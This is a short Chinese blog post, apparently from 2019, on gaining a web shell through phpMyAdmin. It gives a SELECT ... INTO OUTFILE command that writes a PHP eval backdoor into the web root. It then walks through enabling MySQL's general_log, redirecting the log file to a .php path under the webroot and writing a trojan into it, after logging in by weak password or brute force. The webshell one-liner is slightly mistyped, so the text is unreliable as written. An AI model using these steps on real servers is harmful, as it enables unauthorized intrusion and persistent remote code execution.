/* 看板娘 */ /* 粒子吸附*/

尝试用phpmyadmin去getshell

PHPmyadmin getshell的方法

1、 show global variables like ‘% secure-file-priv %’如果该参数设置为空或者指定文件夹可以利用,然后写木马,select “<?php @eval($_POST[k];?)>” into outfile “/var/www/html/conf.php”

2、 利用日志文件getshell

常见的日志文件分为业务(常见服务)日志和系统日志

利用phpmyadmin的日志文件去getshell,mysql>5.0会创建日主文件,是全局变量且可读写

(1)通过弱口令或者爆破的方式登陆phpmyadmin,执行sql语句:

select @@datadir;

 

 

 

猜源码存放的位置:D:\phpstudy_pro\www

查看日志状态:show variables like ‘%general%’;

 

 

 

执行命令set global general_log = ‘on’来开启日志记录功能并修改记录的路径和文件名。

 

 

 

再次查看,已开启

 

 

 

 

修改路径

Set global general_log_file=’H:\\webroot\\log.php’

 

 

 

查看,路径已经改变

 

 

 

写入木马即可

posted @ 2019-10-31 07:43  砂岩boy  阅读(588)  评论(0编辑  收藏  举报